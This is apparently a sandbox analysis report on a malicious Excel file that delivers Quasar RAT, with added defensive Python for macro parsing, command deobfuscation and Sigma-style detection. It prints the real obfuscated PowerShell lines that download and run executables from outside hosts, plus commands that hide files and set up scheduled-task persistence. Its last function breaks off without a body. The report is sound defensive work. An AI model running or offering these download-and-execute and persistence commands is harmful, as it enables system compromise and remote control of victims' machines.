
Analysis Report spetsifikatsiya.xls

Overview

General Information

Sample Name: spetsifikatsiya.xls
Analysis ID: 336545
MD5: 2e0819723d50d0b6a2e6ffdb33778e40
SHA1: 329d002fc53f93e92b99dfbc5937412b40fccf93
SHA256: 04ee61f1184be78db3fd78821306e0b81e6dfaff17f6019d76e69237d6133b6a
Tags: SilentBuilder, xls

Detection

Hidden Macro 4.0 Quasar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM_3
Yara detected Quasar RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide a thread from the debugger
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
May check the online IP address of the machine
Obfuscated command line found
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Obfuscated Powershell
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1100 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2384 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2864 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2356 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2928 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2320 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2908 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • attrib.exe (PID: 2236 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)
    • cmd.exe (PID: 1960 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2464 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • cmd.exe (PID: 1252 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • mode.com (PID: 2152 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)
          • cmd.exe (PID: 2196 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 2232 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • powershell.exe (PID: 1684 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
              • sp.exe (PID: 1068 cmdline: 'C:\Users\user\AppData\Roaming\sp.exe' MD5: E79F542FB3F5AA6E4400953BE24780DB)
                • schtasks.exe (PID: 912 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                • sp.exe (PID: 2492 cmdline: {path} MD5: E79F542FB3F5AA6E4400953BE24780DB)
                • sp.exe (PID: 552 cmdline: {path} MD5: E79F542FB3F5AA6E4400953BE24780DB)
                  • eyBLwzbrUF1mwXoy.exe (PID: 660 cmdline: 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe' MD5: CEC5782C931581F13CE3C5D5B6A948A2)
                    • schtasks.exe (PID: 1784 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                  • ars4t7gFPGrepVgh.exe (PID: 2136 cmdline: 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe' MD5: CEC5782C931581F13CE3C5D5B6A948A2)
                    • schtasks.exe (PID: 2932 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • cmd.exe (PID: 960 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2852 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
spetsifikatsiya.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x393c2:$s1: Excel
  • 0x35aaf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
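The $Auto_Open string of SUSP_Excel4Macro_AutoOpen is a raw byte pattern, and it pays to know what those bytes are: 0x0018 is the BIFF NAME (Lbl) record id and 0x0017 its 23-byte length; flags 0x0020 set fBuiltin (fHidden, bit 0, is clear); cch is 1 and cce is 7; after the reserved fields, 0x01 is the built-in name code for Auto_Open and 0x3A (ptgRef3d) begins the 7-byte formula that points the name at a cell on another sheet. Whether that sheet is hidden is recorded in the BOUNDSHEET record, not in the name, which is why a record-aware parse adds to what the raw string match can say and is what the report's "Hidden Macro 4.0" verdict rests on. The Python below is an added example, not code from the report or from the rule author. It walks a raw BIFF Workbook stream, decodes BOUNDSHEET and NAME records, and reports macro sheets, their visibility, and auto-executing built-in names. It assumes you have already extracted the Workbook stream from the OLE container (for instance with olefile's `OleFileIO(path).openstream('Workbook').read()`; olefile is a third-party module and that call is an assumption, not something the report does), it does not handle CONTINUE records, and the sample stream at the bottom is constructed for the demonstration, not taken from spetsifikatsiya.xls.

```python
import struct

# BIFF8 record ids used below (MS-XLS)
REC_BOF = 0x0809
REC_EOF = 0x000A
REC_BOUNDSHEET = 0x0085   # one per sheet: stream offset, visibility, sheet type, name
REC_NAME = 0x0018         # Lbl: a defined name, possibly a built-in such as Auto_Open

# Built-in name codes that auto-execute Excel 4.0 macros (MS-XLS BuiltInName)
AUTO_EXEC_BUILTINS = {0x01: "Auto_Open", 0x02: "Auto_Close",
                      0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
SHEET_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VB module"}

# The $Auto_Open string of SUSP_Excel4Macro_AutoOpen as quoted in the report:
# NAME header, flags=fBuiltin, cch=1, cce=7, built-in code 0x01, first rgce byte 0x3A.
YARA_AUTO_OPEN = bytes.fromhex("18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A")


def iter_records(stream: bytes):
    """Walk a raw BIFF stream: every record is <id:u16 LE><length:u16 LE><payload>."""
    pos = 0
    while pos + 4 <= len(stream):
        rec_id, length = struct.unpack_from("<HH", stream, pos)
        pos += 4
        yield rec_id, stream[pos:pos + length]
        pos += length


def _decode(raw: bytes, high_byte: bool) -> str:
    # 8-bit "compressed" strings are code-page text; latin-1 is a lossless stand-in for triage.
    return raw.decode("utf-16-le" if high_byte else "latin-1")


def parse_boundsheet(payload: bytes) -> dict:
    """BoundSheet8: lbPlyPos(4) | hsState (low 2 bits) | dt(1) | cch(1) | fHighByte(1) | name."""
    hs_state = payload[4] & 0x03
    sheet_type = payload[5]
    cch = payload[6]
    high_byte = bool(payload[7] & 0x01)
    name = _decode(payload[8:8 + cch * (2 if high_byte else 1)], high_byte)
    return {"name": name,
            "state": SHEET_STATE.get(hs_state, hs_state),
            "type": SHEET_TYPE.get(sheet_type, sheet_type)}


def parse_name(payload: bytes) -> dict:
    """Lbl: flags(2) chKey(1) cch(1) cce(2) reserved(2) itab(2) reserved(4) | fHighByte(1) | name | rgce."""
    flags, _ch_key, cch, cce = struct.unpack_from("<HBBH", payload, 0)
    builtin = bool(flags & 0x0020)
    hidden = bool(flags & 0x0001)
    high_byte = bool(payload[14] & 0x01)
    if builtin:
        # A built-in name is a single code byte, not text.
        name = AUTO_EXEC_BUILTINS.get(payload[15], "builtin_0x%02x" % payload[15])
        body_end = 16
    else:
        body_end = 15 + cch * (2 if high_byte else 1)
        name = _decode(payload[15:body_end], high_byte)
    return {"name": name, "builtin": builtin, "hidden": hidden,
            "rgce": payload[body_end:body_end + cce]}


def triage_xlm(stream: bytes) -> dict:
    """Flag Excel 4.0 macro sheets, their visibility, and auto-executing built-in names."""
    macro_sheets, auto_exec = [], []
    for rec_id, payload in iter_records(stream):
        if rec_id == REC_BOUNDSHEET:
            sheet = parse_boundsheet(payload)
            if sheet["type"] == "macro sheet":
                macro_sheets.append(sheet)
        elif rec_id == REC_NAME:
            name = parse_name(payload)
            if name["builtin"] and name["name"] in AUTO_EXEC_BUILTINS.values():
                auto_exec.append(name)
    return {"macro_sheets": macro_sheets,
            "auto_exec_names": auto_exec,
            "hidden_macro_sheet": any(s["state"] != "visible" for s in macro_sheets),
            "auto_open": any(n["name"] == "Auto_Open" for n in auto_exec)}


# Constructed Workbook stream (not bytes from the sample): BOF, one very-hidden macro
# sheet "Macro1", the Yara NAME bytes plus six zero bytes completing the 7-byte
# ptgRef3d formula (ixti, row, col all 0), then EOF.
SAMPLE_STREAM = (
    struct.pack("<HH", REC_BOF, 16) + bytes.fromhex("00 06 05 00") + bytes(12)
    + struct.pack("<HH", REC_BOUNDSHEET, 14) + struct.pack("<I", 0x100)
    + bytes([0x02, 0x01, 6, 0]) + b"Macro1"        # hsState=2 (very hidden), dt=1 (macro)
    + YARA_AUTO_OPEN + bytes(6)
    + struct.pack("<HH", REC_EOF, 0)
)

if __name__ == "__main__":
    print(triage_xlm(SAMPLE_STREAM))
```

The Yara string matches the NAME record wherever it sits in the file, which is what makes the rule cheap; the parser adds the BOUNDSHEET visibility and the formula bytes, which is what you need to say "hidden macro sheet with Auto_Open" rather than "Auto_Open somewhere". Feeding it the real stream also tells you which built-in fired (Auto_Close and Auto_Activate are used for the same purpose), which the rule name alone does not.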

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x1299b:$r1: p^owersh^el^l
  • 0x12c2b:$r1: p^owersh^el^l
  • 0x12eff:$r1: p^owersh^el^l
  • 0x13143:$r1: p^owersh^el^l
  • 0x1299b:$r2: p^owersh^el^l
  • 0x12c2b:$r2: p^owersh^el^l
  • 0x12eff:$r2: p^owersh^el^l
  • 0x13143:$r2: p^owersh^el^l
dump.pcap | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\pd.bat | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0xd4:$r1: p^owersh^el^l
  • 0x364:$r1: p^owersh^el^l
  • 0x5f2:$r1: p^owersh^el^l
  • 0x836:$r1: p^owersh^el^l
  • 0xd4:$r2: p^owersh^el^l
  • 0x364:$r2: p^owersh^el^l
  • 0x5f2:$r2: p^owersh^el^l
  • 0x836:$r2: p^owersh^el^l
C:\Users\user\Documents\pd.bat | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security
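The process tree in the Startup section and the SUSP_PowerShell_Caret_Obfuscation_2 hits on dump.pcap and pd.bat show the same trick from two sides: cmd.exe carets (`powershe^l^l`), PowerShell backticks (`stARt`-slE`Ep`, `nEw-oB`jecT`) and a split string literal (`'Down'+'loadFile'`) break up the keywords that string scanners look for, while each interpreter silently removes the escapes before execution. The Python below, an added example rather than anything from the report or from Joe Sandbox, reverses those three transformations over the command lines quoted in the process tree and pulls out the download URLs. It is a triage normalizer, not a PowerShell parser: it drops every backtick, so `$e`nV:T`EMP` comes back as `$env:TEMP`, which is the evident intent, although a literal `n is PowerShell's newline escape in double-quoted text and the trace itself shows pd.bat being launched from C:\Users\user\Documents rather than from %TEMP%. Read the output as an aid, and confirm recovered URLs against the HTTP requests in the Networking section.

```python
import re

# Command lines copied from the report's process tree. Joe Sandbox shows double quotes
# as single quotes in that view, so the quoting below is as displayed, not as typed.
CMDLINES = [
    r"cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'",
    r"cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')",
    r"Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'",
]

# Canonical spellings for the tokens whose case the sample scrambles
CANONICAL = ["powershell", "Start-Sleep", "Start-Process", "New-Object", "Net.WebClient",
             "DownloadFile", "Move-Item", "Remove-Item", "$env:TEMP", "$env:APPDATA"]


def strip_cmd_carets(s: str) -> str:
    """cmd.exe: '^' escapes the next character, so 'p^owersh^el^l' is 'powershell'
    and '^^' is one literal caret. This is what SUSP_PowerShell_Caret_Obfuscation_2 keys on."""
    return re.sub(r"\^(.)", r"\1", s)


def strip_ps_backticks(s: str) -> str:
    """PowerShell: a backtick escapes the next character, so 'stARt`-slE`Ep' is Start-Sleep.
    Dropping every backtick is the usual triage normalization, not a PowerShell parser:
    inside double quotes `n is a newline and inside single quotes backticks are literal."""
    return re.sub(r"`(.)", r"\1", s)


def join_string_concats(s: str) -> str:
    """Fold ('Down'+'loadFile') back into ('DownloadFile'), repeatedly for longer chains."""
    pattern = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while pattern.search(s):
        s = pattern.sub(r"'\1\2'", s)
    return s


def canonicalize_case(s: str) -> str:
    """Restore conventional casing so the result greps and reads like hand-written code."""
    for word in CANONICAL:
        s = re.sub(re.escape(word), word, s, flags=re.IGNORECASE)
    return s


def normalize(cmdline: str) -> str:
    return canonicalize_case(join_string_concats(strip_ps_backticks(strip_cmd_carets(cmdline))))


URL_RE = re.compile(r"https?://[^\s'\"(),;]+")


def extract_urls(cmdlines) -> list:
    """Download URLs, in order of first appearance, from the normalized command lines."""
    found = []
    for c in cmdlines:
        for url in URL_RE.findall(normalize(c)):
            if url not in found:
                found.append(url)
    return found


if __name__ == "__main__":
    for c in CMDLINES:
        print(normalize(c))
    print(extract_urls(CMDLINES))
```

Normalization is also the right input for detection content: a rule that looks for `New-Object Net.WebClient` plus `DownloadFile` in the normalized text catches this sample and every caret or backtick variant of it, whereas a rule on the raw text has to enumerate escape placements. Keep the raw line alongside, since the presence of escapes is itself the signal the Yara rule above is built on.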

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x1a69a:$r1: p^owersh^el^l
  • 0x1a92a:$r1: p^owersh^el^l
  • 0x1abb8:$r1: p^owersh^el^l
  • 0x1adfc:$r1: p^owersh^el^l
  • 0x1cd34:$r1: p^owersh^el^l
  • 0x1cfc4:$r1: p^owersh^el^l
  • 0x1d252:$r1: p^owersh^el^l
  • 0x1d496:$r1: p^owersh^el^l
  • 0x1d74c:$r1: p^owersh^el^l
  • 0x1d9dc:$r1: p^owersh^el^l
  • 0x1dc6a:$r1: p^owersh^el^l
  • 0x1deae:$r1: p^owersh^el^l
  • 0x1a69a:$r2: p^owersh^el^l
  • 0x1a92a:$r2: p^owersh^el^l
  • 0x1abb8:$r2: p^owersh^el^l
  • 0x1adfc:$r2: p^owersh^el^l
  • 0x1cd34:$r2: p^owersh^el^l
  • 0x1cfc4:$r2: p^owersh^el^l
  • 0x1d252:$r2: p^owersh^el^l
  • 0x1d496:$r2: p^owersh^el^l
  • 0x1d74c:$r2: p^owersh^el^l
00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x3df1c:$s1: DoUploadAndExecute
  • 0x3e160:$s2: DoDownloadAndExecute
  • 0x3dce1:$s3: DoShellExecute
  • 0x3e118:$s4: set_Processname
  • 0x5824:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5748:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x61ae:$op3: 00 04 03 69 91 1B 40
  • 0x69fe:$op3: 00 04 03 69 91 1B 40
00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
0000001F.00000002.2281214797.0000000002131000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x34e9ac:$s1: DoUploadAndExecute
  • 0x3a57cc:$s1: DoUploadAndExecute
  • 0x34ebf0:$s2: DoDownloadAndExecute
  • 0x3a5a10:$s2: DoDownloadAndExecute
  • 0x34e771:$s3: DoShellExecute
  • 0x3a5591:$s3: DoShellExecute
  • 0x34eba8:$s4: set_Processname
  • 0x3a59c8:$s4: set_Processname
  • 0x3162b4:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x36d0d4:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x3161d8:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x36cff8:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x316c3e:$op3: 00 04 03 69 91 1B 40
  • 0x31748e:$op3: 00 04 03 69 91 1B 40
  • 0x36da5e:$op3: 00 04 03 69 91 1B 40
  • 0x36e2ae:$op3: 00 04 03 69 91 1B 40
(5 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack | Vermin_Keylogger_Jan18_1 | Detects Vermin Keylogger | Florian Roth
  • 0x3ebff:$x3: GetKeyloggerLogsResponse
  • 0x3de57:$x4: GetKeyloggerLogs
  • 0x3e12f:$s1: <RunHidden>k__BackingField
  • 0x3edc7:$s2: set_SystemInfos
  • 0x3e158:$s3: set_RunHidden
  • 0x3dc8b:$s4: set_RemotePath
  • 0x56628:$s6: Client.exe
  • 0x566bc:$s6: Client.exe
  • 0x32031:$s7: xClient.Core.ReverseProxy.Packets
35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack | xRAT_1 | Detects Patchwork malware | Florian Roth
  • 0x305c0:$x4: xClient.Properties.Resources.resources
  • 0x30481:$s4: Client.exe
  • 0x3e158:$s7: set_RunHidden
35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x3e11c:$s1: DoUploadAndExecute
  • 0x3e360:$s2: DoDownloadAndExecute
  • 0x3dee1:$s3: DoShellExecute
  • 0x3e318:$s4: set_Processname
  • 0x5a24:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5948:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x63ae:$op3: 00 04 03 69 91 1B 40
  • 0x6bfe:$op3: 00 04 03 69 91 1B 40
35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth
  • 0x3ebff:$x1: GetKeyloggerLogsResponse
  • 0x3ee3f:$s1: DoShellExecuteResponse
  • 0x3e7ae:$s2: GetPasswordsResponse
  • 0x3ed12:$s3: GetStartupItemsResponse
  • 0x3e130:$s5: RunHidden
  • 0x3e14e:$s5: RunHidden
  • 0x3e15c:$s5: RunHidden
  • 0x3e170:$s5: RunHidden
35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0x4f631:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 ...
  • 0x4f867:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C ...
(2 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\sp.exe' , ParentImage: C:\Users\user\AppData\Roaming\sp.exe, ParentProcessId: 1068, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp', ProcessId: 912
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1100, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2384
Sigma detected: Hiding Files with Attrib.exe
Source: Process started | Author: Sami Ruohonen | Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2908, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 2236
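The three Sigma hits above name the rules and list the fields they matched on, but not the matching logic. As an added example (my reconstruction, not the SigmaHQ rule YAML and not Joe Sandbox code), the Python below expresses each condition as I read it from the reported fields, runs all three over constructed Sysmon-style process-creation events whose Image, ParentImage and CommandLine values are taken from the hits above, and includes one benign event that must not match. The conditions and the lists of Office and shell binaries are assumptions; compare them with the published rules before relying on them.

```python
import re

# Constructed process-creation events in Sysmon Event ID 1 field names. The first three
# carry the Image / ParentImage / CommandLine values from this report's Sigma hits; the
# fourth is a benign control that must not match.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r"cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'"},
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\sp.exe",
     "CommandLine": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'"},
    {"Image": r"C:\Windows\System32\attrib.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"'C:\Windows\system32\attrib.exe' +s +h pd.bat"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\user\Documents\notes.txt"},
]

# Assumed process lists; the published rules carry their own.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawning_shell(ev: dict) -> bool:
    """Office parent with a shell or script-host child: the first hop of this sample."""
    return _basename(ev["ParentImage"]) in OFFICE_APPS and _basename(ev["Image"]) in SHELLS


def scheduled_task_from_temp(ev: dict) -> bool:
    """schtasks /Create whose /XML task definition sits under AppData\\Local\\Temp."""
    cl = ev["CommandLine"].lower()
    return (_basename(ev["Image"]) == "schtasks.exe" and "/create" in cl
            and re.search(r"/xml\s+['\"]?[^'\"]*\\appdata\\local\\temp\\", cl) is not None)


def attrib_hiding(ev: dict) -> bool:
    """attrib.exe setting the hidden bit (+h), with or without +s."""
    cl = ev["CommandLine"].lower()
    return _basename(ev["Image"]) == "attrib.exe" and re.search(r"(^|\s)\+h(\s|$)", cl) is not None


RULES = {
    "Microsoft Office Product Spawning Windows Shell": office_spawning_shell,
    "Scheduled temp file as task from temp location": scheduled_task_from_temp,
    "Hiding Files with Attrib.exe": attrib_hiding,
}


def evaluate(events) -> list:
    """Names of the rules each event triggers, in event order."""
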